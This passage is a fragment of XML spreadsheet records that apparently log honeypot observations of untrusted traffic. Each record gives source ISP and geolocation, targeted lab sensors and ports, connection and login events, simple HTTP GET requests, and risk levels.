    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b4f2:4538"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1665"/>
    <x v="1665"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T12:37:47"/>
    <d v="2024-11-27T17:33:44"/>
    <d v="2025-04-15T12:37:47"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43"/>
    <s v="1433&amp;&amp;445"/>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2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (59.94.36.14,50998)}&amp;&amp;{Data_SMB:Incoming connection (59.94.36.14,51770)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (59.94.36.14,58727)}&amp;&amp;{Data_SMB:Incoming connection (59.94.36.14,59467)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5e:240e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1666"/>
    <x v="1666"/>
    <s v="218-161-31-124.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T12:11:24"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-15T12:11:24"/>
    <n v="511"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H39&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;20460&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:daa1:1f7c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1667"/>
    <x v="1667"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T12:04:16"/>
    <d v="2025-04-15T12:04:16"/>
    <d v="2025-04-15T12:04:16"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Mumbai"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb4:b9ca"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1668"/>
    <x v="1668"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T11:43:36"/>
    <d v="2025-04-15T11:42:42"/>
    <d v="2025-04-15T11:43:36"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b61:d7eb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1669"/>
    <x v="1669"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T11:41:39"/>
    <d v="2025-04-15T11:41:39"/>
    <d v="2025-04-15T11:41:39"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b638:ea58"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1670"/>
    <x v="1670"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T11:35:03"/>
    <d v="2025-04-04T20:54:51"/>
    <d v="2025-04-15T11:35:03"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="Viettel Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7468:d20a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1671"/>
    <x v="1671"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T11:34:00"/>
    <d v="2025-04-15T11:34:00"/>
    <d v="2025-04-15T11:34:00"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:9bb8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1672"/>
    <x v="1672"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T11:18:36"/>
    <d v="2025-03-01T05:36:46"/>
    <d v="2025-04-15T11:18:36"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="South East"/>
    <s v="New Delhi (Okhla)"/>
    <s v="1261481"/>
    <s v="110020"/>
    <s v="28.5317"/>
    <s v="77.2766"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="residential"/>
    <s v="Bharti Telenet Ltd."/>
    <s v="2008-07-07"/>
    <s v="BNLD-209392-NewDelhi"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7ab0:deca"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1673"/>
    <x v="1673"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T11:18:11"/>
    <d v="2025-04-15T11:18:11"/>
    <d v="2025-04-15T11:18:11"/>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d:5184"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1674"/>
    <x v="1674"/>
    <s v="NA&amp;&amp;125-229-90-37.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-15T11:11:18"/>
    <d v="2023-07-24T17:33:36"/>
    <d v="2025-04-15T11:11:18"/>
    <n v="213326"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DHCP_H23&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;67&amp;&amp;19302&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100"/>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login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:5a25"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1675"/>
    <x v="1675"/>
    <s v="1-34-145-215.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T11:10:44"/>
    <d v="2024-04-16T13:52:14"/>
    <d v="2025-04-15T11:10:44"/>
    <n v="432"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;45815&amp;&amp;80&amp;&amp;9100&amp;&amp;6147&amp;&amp;53894"/>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login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:122:91d7"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1676"/>
    <x v="1676"/>
    <s v="114-34-196-89.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T11:10:15"/>
    <d v="2024-04-02T06:17:00"/>
    <d v="2025-04-15T11:10:15"/>
    <n v="537"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;21715&amp;&amp;56217&amp;&amp;23&amp;&amp;NA&amp;&amp;9100"/>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login&amp;&amp;NA&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7222:c459"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1677"/>
    <x v="1677"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T10:45:24"/>
    <d v="2023-07-25T06:25:05"/>
    <d v="2025-04-15T10:45:24"/>
    <n v="741"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_SSH_H13&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;1433&amp;&amp;22&amp;&amp;62180&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="BD"/>
    <s v="Bangladesh"/>
    <s v="C"/>
    <s v="Dhaka Division"/>
    <s v="Dhaka"/>
    <s v="Dhaka (Gulshan)"/>
    <s v="1185241"/>
    <s v="1212"/>
    <s v="23.7971"/>
    <s v="90.4133"/>
    <s v="23688"/>
    <s v="Link3 Technologies Limited"/>
    <s v="Link3 Technologies Limited"/>
    <s v="business"/>
    <s v="Corporate Subscriber"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b93:d981"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1678"/>
    <x v="1678"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T10:33:18"/>
    <d v="2025-04-15T10:33:18"/>
    <d v="2025-04-15T10:33:18"/>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3b5d:97c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1679"/>
    <x v="1679"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T10:22:56"/>
    <d v="2025-04-15T02:09:45"/>
    <d v="2025-04-15T10:22:56"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
